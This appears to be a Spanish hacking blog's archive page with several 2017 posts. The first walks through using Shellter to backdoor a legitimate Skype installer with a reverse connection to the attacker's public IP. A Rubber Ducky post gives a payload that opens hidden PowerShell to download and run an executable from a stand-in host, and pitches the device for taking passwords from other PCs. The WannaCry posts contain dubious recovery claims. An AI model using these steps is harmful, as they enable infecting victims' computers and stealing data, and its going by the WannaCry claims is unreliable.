viernes, 7 de julio de 2017

Crear una Backdoor fuera de conexión local para infectar Windows (Parte I - Introducción a los puertos y Shellter)

En antiguos artículos publique una explicación de como infectar Android desde conexión local, pero muchos de los que leísteis el artículo se quedaba un poco corto en el aspecto de eso la conexión solo local. En este artículo intentaré explicar lo más exactamente posible como infectar un máquina Windows fuera de nuestra propia red desde el SO Kali Linux. 


Utilizaremos la aplicación shellter para crear el exe infectado. Para poder activar la escucha desde tu PC deberemos abrir puertos en concreto, yo abriré los puertos 6666, aquí dejaré un pequeño enlace donde se explica como abrir los puertos en el caso de cada router, vamos una visión un poco más general.


+ Ver abrir puertos.

A continuación descargaremos cualquier aplicación .exe a infectar, como pueden ser instaladores de diferentes herramientas supuestamente no peligrosas para el sistema. En mi caso lo haré con Skype.
Apuntar que al ser shellter un programa .exe deberemos tener antes Wine configurado y actualizado correctamente. Descargaremos Shellter y descargaremos también el programa en cuestión que queramos infectar e iremos al directorio con los ya tradicionales.
cd Escritorio/
cd shellter/ 
Con esto llegaremos a la ruta donde crear nuestro .exe. Para ello tendremos que ejecutar shellter con la orden
wine shellter.exe
Y ponerlo en automático, con la entrada "a", desde ahí tendremos que seleccionar la aplicación que queremos infectar, en mi caso SkypeSetup.exe y entonces veremos como se integra la nueva dll para crear el backdoor en Windows 10.

Nos pregutará si queremos que la aplicación se abra o solo queremos abrir el dll, normalmente se selecciona la primero pero como esto es solo un pueba pondremos "n" para que no se nos abra toda la parafernalia de Setup.

A continuación en la línea:
SET LHOST:
SET LPORT:
Pondremos nuestra IP pública en LHOST y en LHOST, simplemente, los puertos previamente abiertos a la hora de abrir los puertos en el router.

Y ya cuando le damos enter veremos que ya estará terminada la inyección. En la segunda parte explicaré la parte de Metasploit para ejecutar el Payload en la máquina infectada. 

viernes, 19 de mayo de 2017

Fé de erratas 1, WannaCry, wireless decript y demás

Llevo ya tiempo escribiendo éste blog, durante el proceso he tenido varios errores que he afirmado como válidos en el momento por no contrastar información o no hacer pruebas de Sofware o Hardware debidamente.

En este artículo enumeraré los errores, sus posibles soluciones y, en el caso de errata sin solución enumeraré en lo que he fallado. 



En el reciente artículo del ransonware wannacry, dije que no se puede desencriptar el disco, ya que con la información que trabajé fue bastante más anterior al artículo y no me molesté en buscar info más reciente. Dicho esto intentaré explicar lo más conciso posible como desencriptar archivos si a tí te ha afectado dicho Malware. Me basaré en un artículo recientemente publicado por Chema Alonso, experto en Cyberseguridad, ejecutivo en Telefónica y fundador de la empresa subcontratada de Telefónica, Eleven Path.

-> Artículo de Chema

**AÑADIR NO ES POSIBLE O DE MOMENTO RECUPERAR TODOS LOS ARCHIVOS**

La solución no es simple, pero si se aplica correctamente, podrás recuperar las siguientes extensiones de archivos que para los que trabajamos con ficheros de texto y archivos de bases de datos nos puede resultar muy útil. Aquí la lista completa de archivos recuperables con éste método.

•.lay6 •.sqlite3 •.sqlitedb •.accdb •.java •.class •.mpeg •.djvu •.tiff •.backup •.vmdk •.sldm •.sldx •.potm •.potx •.ppam •.ppsx •.ppsm •.pptm •.xltm •.xltx •.xlsb •.xlsm •.dotx •.dotm •.docm •.docb •.jpeg •.onetoc2 •.vsdx •.pptx •.xlsx •.docx

Y aquí los archivos exentos de WannaCry:

  • .doc – Legacy Word document.
  • .dot – Legacy Word templates.
  • .wbk - Legacy Word document backup.
  • .xls – Legacy Excel worksheets.
  • .xlt – Legacy Excel templates.
  • .xlm – Legacy Excel macro.
  • .ppt – Legacy PowerPoint presentation.
  • .pps - Legacy PowerPoint presentation.
  • .pot – Legacy PowerPoint template.
  • .pps – Legacy PowerPoint slideshow.
  • .pdf - Portable Document Format.
  • .odt - Open Document Text.
  • .ods - Open Document Spreadsheet.
  • .odp - Open Document Presentation.
  • .odg - Open Document Graphic.
  • .sxw - Open Office Binario.
  • .rtf - Rich Text Format.
  • .tmp - PowerPoint Temporary PPT.
  • .xar - Excel Temporary XLS.
  • .asd - Word Temporary DOC.

Y quizás la forma más simple de recuperar los archivos sería tener una copia de seguridad o en la nube o en un disco duro externo pero si nuestra nube no está protegida contra este tipo de ataques será inútil intentar recuperar algo de la forma tradicional.

Para salvar archivos, afectados por WannaCry nos podríamos fijar en que dichos archivos van a para a la carpeta %temp% eso significa que después de la encriptación, manda los ficheros encriptados con sólo una extensión cambiada (.WCNYT) lo que significa es que los archivos de esta carpeta serán ficheros temporales los cuales (previamente con el malware fuera del pc) se podrán desencriptar con un simple cambio de nombre.

**WANNACRY SE PODRÁ ELIMINAR CON LA SIGUIENTE HERRAMIENTA LIBERADA POR ELEVEN PATH EN HITHUB, AQUÍ UN VÍDEO EXPLICATIVO



En siguientes artículos iré enumerando más erratas en este blog y como solucionarlas con el fin de ser lo más instructivo posible y que no os confundáis con la práctica de las técnicas aquí mencionadas.



Fuentes: http://www.elladodelmal.com/2017/05/como-recuperar-ficheros-afectados-por.html

martes, 16 de mayo de 2017

¿Qué es y cómo funciona el Ransomware que ha hecho tembar medio mundo?

Esta semana se ha venido comentando mucho la noticia sobre el Ransomware que ha afectado a importantes empresas y equipos varios funcionando con Windows 10, en este artículo intentaré explicar como funciona.



Este Malware, conocido como WannaCry, se dedica a encriptar los archivos del disco duro de la víctima o víctimas (si hablamos de red Local como en el caso de telefónica) y pedir un rescate en Bitcoins. El Malware funciona através de una brecha de seguridad de la pasa actualización de Windows 10 haciendo así que las máquinas que abran el archivo infectado en cuestión y no tengan sus sistema Windows actualizado debidamente se infecten a través de ese fallo de seguridad.

Normalmente estos archivos infectados se transmiten mediante Spam, el funcionamiento es simple; te llega un correo supuestamente venigno con cualquier tontería sobre cualquier cosa al azar, tu abres el zip, el zip activa exploits y boilá tus archivos están encriptados y la única forma de desencriptarlos será pagar el rescate. Por desgracia.


La única recomendación que se podría dar en el caso de sufrir este ataque, aunque sé de buena mano que los que visitáis este blog sois cautelosos, sería desconectar el disco duro y esperar a que se liberara al mundo algún tipo de software que permitiera desencriptar los archivos que encriptó el Malware.

No solo Telefónica fue afectada en este ataque

No solo telefónica salió mal parada de este ataque muchas empresas Españoles e internacionales de menor importancia salieron escaldadas de este Malware. Empresas como Gas Natural y otras importantes, hasta gente de a pie fueron las afectadas como muestra este comunicado el ataque se distribuye a través de comandos SMB que hace que el Malware se distribuya a través de equipos de la misma red Windows.

El principal problema, como he comentado antes es el '0 Day' que publicó y corrigió Windows en la última actualización cosa que utilizaron los cyberdelincuentes para hacer de las suyas.

Sistemas infectados

Entre los sistemas infectados pueden estar Windows 7, 8.1, Windows 10, Windows Vista SP2, Windows Server 2008/2012/2016, como afirma el informe.

-> Comunicado de la CNN-CERT

-> Fuente

martes, 4 de abril de 2017

Configurando red en Arch Linux

Ayer instalé ArchLinux en mi portátil, todo fue sobre ruedas aunque la instalación no es muy user frendly me las arreglé para poder cargarlo y aceder al escritorio. Instalé el entorno de escritorio Xfce por su poco peso y me decidí a instalar todo lo necesario ya en la interfaz gráfica, pero me encontré con una sorpresa... No me reconocía el adaptador wifi por lo tanto las primeras acciones de actualizar el sistema e instalar todo el programario deseado fue un auténtico calvario que me saco más tiempo del que esperaba dedicar a la instalación, a contunuación os enumeraré errores de los que me salí por suerte.


Para comenzar me daba el siguiente error al acceder a la interfaz wifi de Xfce: La red inalámbrica está desactivada, googleando un poco saqué en claro que era problema del adaptador y debía elegir alguna alternativa para poder conectarme y así descargar todo lo necesario para poder conectarme a internet. Primero para ayudarme de un PC (ya que estaba utiizando el móvil y no es demasiado cómodo que digamos) compartí la conexión 4g através de bluetooth, allí ya tenía un punto de salida. Lo hice así:

Primero accedí a la configuración wifi que instalé previamente cuando instalaba el sistema


Lo único que tube que hacer después fue activar el anclaje por Bluetooth en Android tal que así

Herramientas>Redes inalámbricas y redes>Más>Anclaje y zona wifi>Anclaje por Bluetooth


Ya tenía acceso a Internet ahora me tocaba buscar una solución y como no después de mucho rato googleando se me ocurrió una manera de poder solucionar el problema basandome en otros consejos que se asemejaban a mi problema pero no me lo solucionaban y hice esto:

Primero abrí la terminal y puse lo siguiente
sudo ip link set "el perfil de tu tarjeta de red" up
Esto levantó la tarjeta de red, y a continuación cree un archivo llamado "wpa_supplicant.conf" tal que así 
sudo nano /etc/wpa_supplicant.conf
Creado ya el archivo le agregué las siguientes líneas
network={
ssid="Nombre de la red"
proto=RSN
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="contraseña de la red"
}
Despues lo único que me quedó por hacer fue incuir el comando para cargar el archivo creado
sudo wpa_supplicant -B -i "el perfil de tu tarjeta de red" -c /etc/wpa_supplicant.conf
A partir de este punto conseguí conectarme a la red wifi no de forma tradicional pero si para poder solucionar mis problemas de actualizaciones y poder solucionar el problema de la tarjeta de red.
_______________________________________________________

NOTAS:

Para saber tu perfil de red solo debes tipear este comando en la terminal:
iwconfig

viernes, 17 de marzo de 2017

USB Rubber Ducky, un teclado malicioso para pruebas de pentesting físico

Hace una semana me llegó a casa mi nuevo USB Rubber Ducky y estos días he estado jugando un poco con él, a continuación os explicaré mis impresiones y os diré cosas que tener en cuenta a la hora de usarlo así como donde comprarlo y os liberaré unos cuando payloads para poder hacer pruebas con el. 


Este USB simula ser un teclado así, los PC's lo reconocerán como un dispositivo de confianza y así poder aplicar payloads sin ningún tipo de sospecha del ordenador en cuestión. Usa un lenguaje propio muy sencillo de comprender. Entre sus características encontramos:
  • Es exactamente igual que una unidad USB Flashdrive lo que hace confiar al usuario a la hora de realizar la ingeniería social
  • Viene con un lector de tarjetas SD para poder cargar los payloads 
  • Escribe 1000 palaras por segundo lo que hará que en poco más de 6 segundos tengamos toda la información de un PC en el simple gesto de enchufar desenchufar 
  • Viene con un led que nos avisa si el Payload esta bien configurado para funcionar o por el contrario tendremos que agregar más argumentos para hacerlo funcional
  • Tiene un botón para cargar los Payloads por si con el simple gesto de enchfa y desenchufar no basta 
Una cosa también importante es el hecho de que viene con una tarjeta micro SD de 128 MB para poder cargar los payloads, tamaño más que suficiente si lo único que queremos es cargar la información de el PC (siempre que no sea demasiado grande) en el caso contrario deberíamos agregarle otra tarjeta de más tamaño.

Su lenguaje como he dicho es la mar de sencillo, con estos sencillos comandos podremos utilizarlo para lo que queramos:
  • DEFAULT_DELAY o DEFAULTDELAY, esto es para definir los milisegundos que tardará en ejecutar las órdenes
  • DELAY, lo mismo pero personalizado 
  • STRING
  • Y por última las keys especiales para cada sistema, para ello deberemos conocer los comandos del terminal del sistema en cuestión. 
Aquí os mostraré un ejemplo de como descargar y ejecutar un archivo al azar:

GUI R 
DELAY 100
STRING powershell -windowstyle hidden
(new-object
System.Net.Web.client).DownloadFile('http://example.com/bob.old',%TEMP%\bob.exe;Start-Process
"%TEMP%/bob.exe"
ENTER

Así es como lo haríamos, a continuación os pondré un series de Payloads preconfigurados para que podáis jugar con vuestros Rubber Ducky.
Y para finalizar os mostraré donde comprar un USB Rubber Ducky

->  https://hakshop.com/products/usb-rubber-ducky-deluxe

Y por si no queréis pagar semejante burrada por un Rubber Ducky aquí os dejo un post antiguo donde explico como montarlo tu mismo por 3$

-> http://www.jarlinx.com/2017/01/como-montar-un-usb-rubber-ducky-por-3.html 

___________________________________________________________________

Fuentes
___________________________________________________________________

http://picateshackz.com/2016/02/list-of-top-rubber-ducky-usb-payloads.html

sábado, 25 de febrero de 2017

Utilizar anonym8 una herramienta para automatizar la navegación sobre la red Tor y i2p

En este artículo os explicaré como instalar y configurar anonym8 para navegar sobre proxys anónimos. 



Anonym8 es un automatizador para la red Tor y i2p que nos permite con una siemple configuración asegurar casi al 100% nuestro anonimato en la red. Para usarlo solo tendremos que ir al enlace oficial de Github.

[Nota: es un programa para Linux, para Win o Mac Os hay otras alternativas]

-> anonym8

Esta herramienta tiene una serie de dependecias para poder funcionar aquí os las dejo:
  • Tor
  • macchanger
  • resolvconf
  • dnsmasq
  • polipo
  • privoxy
  • arm
  • libnotify
  • curl
  • bleachbit
No nos preocuparemos por instalarlas ya que el programa las descarga solas pero si hay algún tipo de error aquí las tenéis enumeradas para que podáis encontrar ese error.

En siguiente paso será instalar el programa, con el archivo .zip previamente descargado procederemos a acceder a la ruta o directorio donde hemos guardado nuestro programa como es clásico con un simple
cd Escritorio/
Y a continuación le daremos permisos de ejecución
chmod +x INSTALL.sh
Y después lo ejecutamos
bash INSTALL.sh
Una vez instalado podremos navegar por las redes Tor y ip2 con total facilidad.

Aquí os dejo unos apuntes para que podáis guiaros por el programa.

-> pastebin.com/PJs0AuAy






  • Tor
  • macchanger
  • resolvconf
  • dnsmasq
  • polipo
  • privoxy
  • arm
  • libnotify
  • curl
  • bleachbit
  • - See more at: https://www.redeszone.net/2016/10/12/conoce-anonym8-una-herramienta-automatizar-proxy-transparente-navegar-traves-tor-redes-i2p/?utm_source=related_posts&utm_medium=widget#sthash.eLBrxYr2.dpuf






  • Tor
  • macchanger
  • resolvconf
  • dnsmasq
  • polipo
  • privoxy
  • arm
  • libnotify
  • curl
  • bleachbit
  • - See more at: https://www.redeszone.net/2016/10/12/conoce-anonym8-una-herramienta-automatizar-proxy-transparente-navegar-traves-tor-redes-i2p/?utm_source=related_posts&utm_medium=widget#sthash.eLBrxYr2.dpuf

    domingo, 22 de enero de 2017

    Como montar un USB Rubber Ducky por 3$

    En este post aprenderemos como montar un USB Rubber Ducky por solo 3$, unos 5€ aquí en España. Ya que el Ducky en cuestión vale más de 50€ con gastos de envío y todo lo incluido, lo podréis ver aquí como ya sabéis, el USB Rubber Ducky es una herramienta que nos permite apropiarnos de las contraseñas de otro PC con solo conectarlo ya que el PC solo lo detectará como un teclado. 

     

    Aquí os dejaré los componentes para poder montarlo:

    -> Adurino Pro Micro
    -> MicroSD Module
    -> Adaptador para Android (en caso de necesitarlo)
    -> Digispark

    Aquí una guía que os lo explicará al detalle

    ->  https://www.youtube.com/watch?v=_yJWwKO3_Z0



    Y por útimo el montaje

    ->  https://www.youtube.com/watch?v=fnplzZByaE4


    En el próximo post os enseñaré como configurarlo para poder hackear Android o Windows. Sin nada más que decir, hasta la próxima.

    *********************FUENTES**********************

    http://seytonic.com/2016/12/03/links-to-buy-arduino-ducky-stuff/